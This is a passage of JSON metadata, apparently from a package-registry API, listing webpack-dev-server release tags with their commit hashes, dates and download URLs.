ases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"c8327833044c2d4d04029e090144e1620704236e","kind":"commit","published_at":"2021-09-07T11:57:20.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"dfca34ed441e9e253839f2fe953463edf3f95a42","kind":"commit","published_at":"2021-08-31T17:36:04.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"c9271b90b476096e1cee29fa8862c1a312fa0394","kind":"commit","published_at":"2021-08-18T18:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0/manifests"},{"name":"v4.0.0-rc.1","sha":"f1fdaa79df1c230f482eebbf7f29814c46dd6b35","kind":"commit","published_at":"2021-08-17T17:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-rc.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-rc.1/manifests"},{"name":"v4.0.0-rc.0","sha":"2e1151eef3e4ae8a3369787d61b2e5763572ede9","kind":"commit","published_at":"2021-07-19T20:23:42.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-rc.0/manifests"},{"name":"v4.0.0-beta.3","sha":"2ab0019010565f19a44c9b949f629e85c6649491","kind":"commit","published_at":"2021-05-06T12:53:07.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"33d77b4b11be218abdd14ac96026c3a5f4aee7bd","kind":"commit","published_at":"2021-04-06T16:42:35.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.2/manifests"},{"name":"v4.0.0-beta.1","sha":"5f649010f96bb8cee551fa5c4cb53ce7ea740406","kind":"commit","published_at":"2021-03-23T17:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.1/manifests"},{"name":"v3.11.2","sha":"5cb545fdc64c9d4b8e557ca86e597db93b3f93f3","kind":"tag","published_at":"2021-01-13T15:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.11.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.2/manifests"},{"name":"v3.11.1","sha":"7e70eeea457a6a154709bd6069c05855f12f7842","kind":"tag","published_at":"2020-12-29T13:25:05.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.11.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.1/manifests"},{"name":"v4.0.0-beta.0","sha":"910133d0a2383823504b3a0c2fd21b5a86e733a4","kind":"commit","published_at":"2020-11-27T17:28:43.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.0.0-beta.0/manifests"},{"name":"v3.11.0","sha":"4ab1f21bc85cc1695255c739160ad00dc14375f1","kind":"commit","published_at":"2020-05-08T15:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"f710b7df93e96c246a00b0362aac489b0857d92f","kind":"tag","published_at":"2020-02-05T11:36:21.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.10.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"5aa86b551d3655445966ffc192488a2086f97789","kind":"commit","published_at":"2020-01-31T15:37:15.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.10.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"cdf7c4f170b6030d8bb8af9a5fe71349267ae29a","kind":"tag","published_at":"2019-12-19T11:19:45.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.10.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"e330423d15a2a0df1fc2c058cce222479e119e8a","kind":"commit","published_at":"2019-12-18T14:35:54.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.10.0/manifests"},{"name":"v3.9.0","sha":"4d99f6d917c1db0f180490be86f794ba8e93089f","kind":"commit","published_at":"2019-10-22T16:46:37.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"9108d5ba1d427b5c96d4b24d0141f43be3394fc6","kind":"commit","published_at":"2019-10-02T16:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.8.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"9d1c6d249fff293ee2d4c1b8792bb0a631f99fd6","kind":"commit","published_at":"2019-09-16T14:06:28.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"84cb4817a3fb9d8d98ac84390964cd56d533a3f5","kind":"commit","published_at":"2019-08-09T17:06:26.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.8.0/manifests"},{"name":"v3.7.2","sha":"26211fc87785052c3707f0a911fed0acde2c54ec","kind":"tag","published_at":"2019-06-17T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.7.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"7fe3fbd95604d52d432174d797de3244e3ebc903","kind":"commit","published_at":"2019-06-07T13:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"3d9288a34b715428c521cd22c6f70b6b2d6a04f4","kind":"commit","published_at":"2019-06-06T15:12:01.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"7e10e7d6ef48cbf6fd8543e9638eeb2673aa4b92","kind":"tag","published_at":"2019-06-05T13:38:56.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.6.0/manifests"},{"name":"v3.5.1","sha":"def98d825c65e75f532c444c44bcfbe6887f336c","kind":"tag","published_at":"2019-06-01T15:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"a0b9c70bbb36a87deea28aabfdaf7c70a36244f8","kind":"commit","published_at":"2019-05-31T16:28:19.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"a32149469ac8524a42fb18372988cb8063dc040a","kind":"tag","published_at":"2019-05-17T16:55:27.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"45d39acd80d474afcde5e0d946d5f367f808d509","kind":"commit","published_at":"2019-05-17T12:41:17.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.4.0/manifests"},{"name":"v3.3.1","sha":"99b78dc3ddeb94af33fe71942ec0312a9be3e2c2","kind":"tag","published_at":"2019-04-09T21:52:56.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.3.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"99e8db0f8cc441bb8f6acc60d786e33c38b8fc1d","kind":"tag","published_at":"2019-04-08T15:56:57.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"bf99c26bc3c8807ab7470e8da50fffc572780029","kind":"commit","published_at":"2019-02-25T11:06:19.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.2.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"df113ebd3a3fe56fadff19f3495d75036274ac17","kind":"tag","published_at":"2019-02-20T13:44:27.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.2.0/manifests"},{"name":"v3.1.14","sha":"4b7a8283f4901a1894bbc93b09d2dcab96ee514b","kind":"tag","published_at":"2018-12-24T09:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.14","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.14/manifests"},{"name":"v3.1.13","sha":"bddfe160808c54ac811eee77d0cd5aa4f157f7c9","kind":"tag","published_at":"2018-12-22T19:24:15.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.13","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.13/manifests"},{"name":"v3.1.12","sha":"94432393ed8659b340452ae7ef24c64c16891dcd","kind":"tag","published_at":"2018-12-22T15:01:37.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.12","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.12/manifests"},{"name":"v3.1.11","sha":"ff2874f5f3a90e5727434cc10f69ac4d54896033","kind":"tag","published_at":"2018-12-21T17:56:34.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.11","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.11/manifests"},{"name":"v3.1.10","sha":"fe3219f614ad84afbaab1ecbd1d9aec4ff337d37","kind":"tag","published_at":"2018-10-23T02:56:05.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.10","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.10/manifests"},{"name":"v3.1.9","sha":"bb484adfcc55d5263fc0123442084d7e9453d4e5","kind":"tag","published_at":"2018-09-24T19:17:01.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.9","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.9/manifests"},{"name":"v3.1.8","sha":"3d37cc5a4a4fc06f0649db8d382ef8484ff73131","kind":"tag","published_at":"2018-09-06T17:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.8","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.8/manifests"},{"name":"v3.1.7","sha":"f37f0a251c6e1815e1ca2a9dc24fe306bb789f1d","kind":"tag","published_at":"2018-08-29T12:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.7","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.7/manifests"},{"name":"v3.1.6","sha":"0e1f0c1b740f5123bd05179a959752f39273dc62","kind":"tag","published_at":"2018-08-26T06:40:47.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.6","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.6/manifests"},{"name":"v2.11.3","sha":"7cdfb742a89831a1f3421e6277463927bfb19332","kind":"tag","published_at":"2018-08-22T18:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.11.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.11.3/manifests"},{"name":"v3.1.5","sha":"e1bd264b9ce5fb0a05a62754883f6c8a36fbc51b","kind":"tag","published_at":"2018-07-22T15:20:01.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.5","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"33be88db96d5d7ec76cfe7ef65367945da05df73","kind":"tag","published_at":"2018-05-02T21:35:13.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"69a90c7edc1983b4ffd968c829bb0d6f543f74dd","kind":"tag","published_at":"2018-04-08T08:32:26.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"74306486d4de1f6a696b5737f88971deb904fb9a","kind":"tag","published_at":"2018-04-07T13:23:46.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"3a7f7d543889707725e5d60fc21fe2de975d627d","kind":"tag","published_at":"2018-03-09T21:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.1.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"94398c40a27ee37c64f22c41777c74cc5f0dee17","k